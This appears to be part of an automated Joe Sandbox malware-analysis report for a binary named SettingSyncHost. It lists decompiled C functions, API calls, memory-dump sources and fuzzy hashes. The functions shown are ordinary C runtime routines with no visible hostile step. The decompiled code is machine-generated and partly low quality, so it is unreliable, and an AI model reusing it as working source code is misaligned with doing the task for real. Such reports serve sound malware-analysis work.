                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                      • API String ID: 3109751735-1866435925
                                                                                                                                      • Opcode ID: 72edc579e28afca4eb969af3f58e7e2554c7ac27e940f2a0bc59440582b2a2ba
                                                                                                                                      • Instruction ID: 3bb050368eb12c625dd405286f2938c292a84ec6921dcce3d0d1ca8d0e72b23d
                                                                                                                                      • Opcode Fuzzy Hash: 72edc579e28afca4eb969af3f58e7e2554c7ac27e940f2a0bc59440582b2a2ba
                                                                                                                                      • Instruction Fuzzy Hash: E311D2B2910708ABC711DF68D802F96F3DCAF45320F15862BFA58DB681F770AD048BA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 46%
                                                                                                                                      			E003A63DB(signed int __eax, signed int __ebx, void* __ecx) {
                                                                                                                                      				signed int _t12;
                                                                                                                                      				signed int _t13;
                                                                                                                                      				intOrPtr _t16;
                                                                                                                                      				signed int _t21;
                                                                                                                                      				intOrPtr _t22;
                                                                                                                                      				intOrPtr _t23;
                                                                                                                                      				intOrPtr _t27;
                                                                                                                                      
                                                                                                                                      				asm("sahf");
                                                                                                                                      				_t12 = __eax / __ebx;
                                                                                                                                      				_t21 = __eax % __ebx;
                                                                                                                                      				_t5 = __ebx - 0xa4f43;
                                                                                                                                      				 *_t5 =  *((intOrPtr*)(__ebx - 0xa4f43)) + 1;
                                                                                                                                      				_t27 =  *_t5;
                                                                                                                                      				if(_t27 != 0) {
                                                                                                                                      					_t12 =  *0xFFFFFFFFFFFFEB34;
                                                                                                                                      					 *(_t12 + 0x70) =  *(_t12 + 0x70) & 0xfffffffd;
                                                                                                                                      				}
                                                                                                                                      				_t13 = _t12 | 0xffffffff;
                                                                                                                                      				_pop(_t22);
                                                                                                                                      				_pop(_t23);
                                                                                                                                      				_pop(_t16);
                                                                                                                                      				return E00393C21(_t13, _t16,  *0xFFFFFFFFFFFFF598 ^ 0xfffff59c, _t21, _t22, _t23);
                                                                                                                                      			}











                                                                                                                                      APIs
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 003A64FE
                                                                                                                                      • DecodePointer.KERNEL32(?,?), ref: 003A652A
                                                                                                                                      • DecodePointer.KERNEL32(?,?), ref: 003A654C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecodePointer
                                                                                                                                      • String ID: g
                                                                                                                                      • API String ID: 3527080286-30677878
                                                                                                                                      • Opcode ID: 85c8448092889526ebf0c17c66a1758f175d5f1de101ed0c32c1dcda1b3592b7
                                                                                                                                      • Instruction ID: 6a2e6deb51d51c291547acb04120a5068dc3f6d04d5269cff3f5adcc3c3b9628
                                                                                                                                      • Opcode Fuzzy Hash: 85c8448092889526ebf0c17c66a1758f175d5f1de101ed0c32c1dcda1b3592b7
                                                                                                                                      • Instruction Fuzzy Hash: F0210A75E047289FDB228B55DC45BA9BBB8FB87314F0840EAD40DA2950D7741E85CF12
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039E066() {
                                                                                                                                      				intOrPtr _t5;
                                                                                                                                      				intOrPtr _t6;
                                                                                                                                      				intOrPtr _t10;
                                                                                                                                      				void* _t12;
                                                                                                                                      				intOrPtr _t15;
                                                                                                                                      				intOrPtr* _t16;
                                                                                                                                      				signed int _t19;
                                                                                                                                      				signed int _t20;
                                                                                                                                      				intOrPtr _t26;
                                                                                                                                      				intOrPtr _t27;
                                                                                                                                      
                                                                                                                                      				_t5 =  *0x4efd40;
                                                                                                                                      				_t26 = 0x14;
                                                                                                                                      				if(_t5 != 0) {
                                                                                                                                      					if(_t5 < _t26) {
                                                                                                                                      						_t5 = _t26;
                                                                                                                                      						goto L4;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t5 = 0x200;
                                                                                                                                      					L4:
                                                                                                                                      					 *0x4efd40 = _t5;
                                                                                                                                      				}
                                                                                                                                      				_t6 = E0039A7FF(_t5, 4);
                                                                                                                                      				 *0x4ee9f8 = _t6;
                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                      					L8:
                                                                                                                                      					_t19 = 0;
                                                                                                                                      					_t15 = 0x3c7b20;
                                                                                                                                      					while(1) {
                                                                                                                                      						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                                                                                                                                      						_t15 = _t15 + 0x20;
                                                                                                                                      						_t19 = _t19 + 4;
                                                                                                                                      						if(_t15 >= 0x3c7da0) {
                                                                                                                                      							break;
                                                                                                                                      						}
                                                                                                                                      						_t6 =  *0x4ee9f8; // 0x0
                                                                                                                                      					}
                                                                                                                                      					_t27 = 0xfffffffe;
                                                                                                                                      					_t20 = 0;
                                                                                                                                      					_t16 = 0x3c7b30;
                                                                                                                                      					do {
                                                                                                                                      						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x4ee8c0 + (_t20 >> 5) * 4))));
                                                                                                                                      						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                                                                                                                                      							 *_t16 = _t27;
                                                                                                                                      						}
                                                                                                                                      						_t16 = _t16 + 0x20;
                                                                                                                                      						_t20 = _t20 + 1;
                                                                                                                                      					} while (_t16 < 0x3c7b90);
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					 *0x4efd40 = _t26;
                                                                                                                                      					_t6 = E0039A7FF(_t26, 4);
                                                                                                                                      					 *0x4ee9f8 = _t6;
                                                                                                                                      					if(_t6 != 0) {
                                                                                                                                      						goto L8;
                                                                                                                                      					} else {
                                                                                                                                      						_t12 = 0x1a;
                                                                                                                                      						return _t12;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}














                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                      • String ID: 0{<$@N
                                                                                                                                      • API String ID: 3494438863-304012756
                                                                                                                                      • Opcode ID: 2457ff4e103e506fae0365797c7065b4cab077a71a10f468a0e20cc1ab64eb72
                                                                                                                                      • Instruction ID: 385fbb4420210b8e1663c85422bb80b1f8181e699f3a4071745beacf3ce3725b
                                                                                                                                      • Opcode Fuzzy Hash: 2457ff4e103e506fae0365797c7065b4cab077a71a10f468a0e20cc1ab64eb72
                                                                                                                                      • Instruction Fuzzy Hash: F011067170561147EF3ACE1FBC95B712795FB84324B29023AE511CF3D2EA70CC814649
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strrchr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                      • Opcode ID: e4434689af5d7507191034382108cbcd03bb8f4a4d6b612f1e0e7a139dc4b027
                                                                                                                                      • Instruction ID: 20d490787941a7fe22118c87c745d38b0c8106f2d7aaf7933bae76a6f36275b3
                                                                                                                                      • Opcode Fuzzy Hash: e4434689af5d7507191034382108cbcd03bb8f4a4d6b612f1e0e7a139dc4b027
                                                                                                                                      • Instruction Fuzzy Hash: 80B148329002E59FDB138F66C8827EEBBF5EF65380F254669E9459B2C2D6349D01CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 003F587E
                                                                                                                                      • _free.LIBCMT ref: 003F58A7
                                                                                                                                      • SetEndOfFile.KERNEL32(00000000,003F40CF,00000000,003EFB86,?,?,?,?,?,?,?,003F40CF,003EFB86,00000000), ref: 003F58D9
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,003F40CF,003EFB86,00000000,?,?,?,?,00000000), ref: 003F58F5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFileLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1547350101-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E49B8: _free.LIBCMT ref: 003E49C6
                                                                                                                                        • Part of subcall function 003EB607: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,003EF896,?,00000000,00000000), ref: 003EB6B3
                                                                                                                                      • GetLastError.KERNEL32 ref: 003EA57F
                                                                                                                                      • __dosmaperr.LIBCMT ref: 003EA586
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 003EA5C5
                                                                                                                                      • __dosmaperr.LIBCMT ref: 003EA5CC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 167067550-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E3614: EnterCriticalSection.KERNEL32(?,?,003E0CC4,00000000,00407890,0000000C,003E0C8B,?,?,003E5C95,?,?,003E5BB2,00000001,00000364,00000006), ref: 003E3623
                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000,00407C50,0000001C,003F41D1,?,?,003EFB86), ref: 003EC321
                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000,?,?,003EFB86,?,?,?,?,?,?,?,?,?,?,003F4148,00000000), ref: 003EC32E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalSection$Enter$Leave
                                                                                                                                      • String ID: HA?$s
                                                                                                                                      • API String ID: 2801635615-2598025280
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                      • _free.LIBCMT ref: 003E5A72
                                                                                                                                      • _free.LIBCMT ref: 003E5AA8
                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2283115069-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,003E4000,003E5D3C,?,?,003DB376,?,?,?,00000000,?,003CB0A7,?,?), ref: 003E5B6C
                                                                                                                                      • _free.LIBCMT ref: 003E5BC9
                                                                                                                                      • _free.LIBCMT ref: 003E5BFF
                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,003DB376,?,?,?,00000000,?,003CB0A7,?,?,?), ref: 003E5C0A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2283115069-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E003975CA(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                      				intOrPtr _t25;
                                                                                                                                      				void* _t26;
                                                                                                                                      				void* _t29;
                                                                                                                                      
                                                                                                                                      				_t29 = __edx;
                                                                                                                                      				_t28 = __ebx;
                                                                                                                                      				_t25 = _a16;
                                                                                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                      					_t26 = E00396E5F(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                      					goto L9;
                                                                                                                                      				} else {
                                                                                                                                      					_t35 = _t25 - 0x66;
                                                                                                                                      					if(_t25 != 0x66) {
                                                                                                                                      						__eflags = _t25 - 0x61;
                                                                                                                                      						if(_t25 == 0x61) {
                                                                                                                                      							L7:
                                                                                                                                      							_t26 = E00396F46(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                      						} else {
                                                                                                                                      							__eflags = _t25 - 0x41;
                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                      								goto L7;
                                                                                                                                      							} else {
                                                                                                                                      								_t26 = E003974BD(__ebx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						L9:
                                                                                                                                      						return _t26;
                                                                                                                                      					} else {
                                                                                                                                      						return E003973DF(__ebx, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}







                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                      • Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                      • Instruction ID: 65f7d20193e2f22905519705794e1e8a32c635c03aa16859aec66720dac92f11
                                                                                                                                      • Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                      • Instruction Fuzzy Hash: DC117B3241414EBBCF175E88CC56CEE3F66BB18350B598414FA5858071C336D9B1AF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • WriteConsoleW.KERNEL32(003E0BCA,003DA6BE,00000000,00000000,003E0BCA,?,003F2C88,003E0BCA,00000001,003E0BCA,003E0BCA,?,003E7F8C,900C408A,?,003E0BCA), ref: 003F5349
                                                                                                                                      • GetLastError.KERNEL32(?,003F2C88,003E0BCA,00000001,003E0BCA,003E0BCA,?,003E7F8C,900C408A,?,003E0BCA,900C408A,003E0BCA,?,003E84D8,00000010), ref: 003F5355
                                                                                                                                        • Part of subcall function 003F531B: CloseHandle.KERNEL32(FFFFFFFE,003F5365,?,003F2C88,003E0BCA,00000001,003E0BCA,003E0BCA,?,003E7F8C,900C408A,?,003E0BCA,900C408A,003E0BCA), ref: 003F532B
                                                                                                                                      • ___initconout.LIBCMT ref: 003F5365
                                                                                                                                        • Part of subcall function 003F52DD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,003F530C,003F2C75,003E0BCA,?,003E7F8C,900C408A,?,003E0BCA,900C408A), ref: 003F52F0
                                                                                                                                      • WriteConsoleW.KERNEL32(003E0BCA,003DA6BE,00000000,00000000,?,003F2C88,003E0BCA,00000001,003E0BCA,003E0BCA,?,003E7F8C,900C408A,?,003E0BCA,900C408A), ref: 003F537A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                      • Opcode ID: 503b3ea285d0b1451e8fe7618293c05af3431e399b2192bdf71ec6e3fc6cf9ab
                                                                                                                                      • Instruction ID: 9b9ec4fac505becb15890db60dc5ad8396c71ba4647d72c9704ad3bf264ed8a0
                                                                                                                                      • Opcode Fuzzy Hash: 503b3ea285d0b1451e8fe7618293c05af3431e399b2192bdf71ec6e3fc6cf9ab
                                                                                                                                      • Instruction Fuzzy Hash: 6BF0AC36501618BBCF271FD5DD04AAA3F6AEB483B1F154025FF18A5121DB728960DB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 003E1B05
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      • _free.LIBCMT ref: 003E1B18
                                                                                                                                      • _free.LIBCMT ref: 003E1B29
                                                                                                                                      • _free.LIBCMT ref: 003E1B3A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      • Opcode ID: e37e9264a057a978a32a907884d3020bd77be464c05d130f65d53327ef2bfd0f
                                                                                                                                      • Instruction ID: fa80f4979a42b0103680c87bc3b03bdbbb81be161c72ff59d351ee347c11b066
                                                                                                                                      • Opcode Fuzzy Hash: e37e9264a057a978a32a907884d3020bd77be464c05d130f65d53327ef2bfd0f
                                                                                                                                      • Instruction Fuzzy Hash: B4E04F744417709AC652AF21BF198453B36B75870431D0926F4103A331C7B70031DB8B
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 003E472D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                      • String ID: pow
                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                      • Opcode ID: 7d08dcfb6456dffe0bc7c2b77c070fa156fdf39c979a63e1de83aec4dd7e8727
                                                                                                                                      • Instruction ID: 56ff2f7bd102c5cd4377b7bac99186f2d2934440c5a0c7da87ba4156fd411e5c
                                                                                                                                      • Opcode Fuzzy Hash: 7d08dcfb6456dffe0bc7c2b77c070fa156fdf39c979a63e1de83aec4dd7e8727
                                                                                                                                      • Instruction Fuzzy Hash: AB51A36190834986DB2B771DCD0137E6BD8DB55700F218E58F1E2862EBEB358CD5DA82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003EAE60: GetOEMCP.KERNEL32(00000000,003EB0D1,?,?,>=,003DE33E,?,?,?), ref: 003EAE8B
                                                                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,>=,003EB118,?,00000000,?,?,?,?,?,?,003DE33E), ref: 003EB323
                                                                                                                                      • GetCPInfo.KERNEL32(00000000,003EB118,?,>=,003EB118,?,00000000,?,?,?,?,?,?,003DE33E,?), ref: 003EB365
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CodeInfoPageValid
                                                                                                                                      • String ID: >=
                                                                                                                                      • API String ID: 546120528-2435745117
                                                                                                                                      • Opcode ID: 5b2d0288226af5e0bd8e56222f5df19a4edc60e3be50f7508f22cad35c5b869d
                                                                                                                                      • Instruction ID: 24c86bbb247957fbf5be9e3ae7f22ea8f1136377f0d118081031d020667c7c40
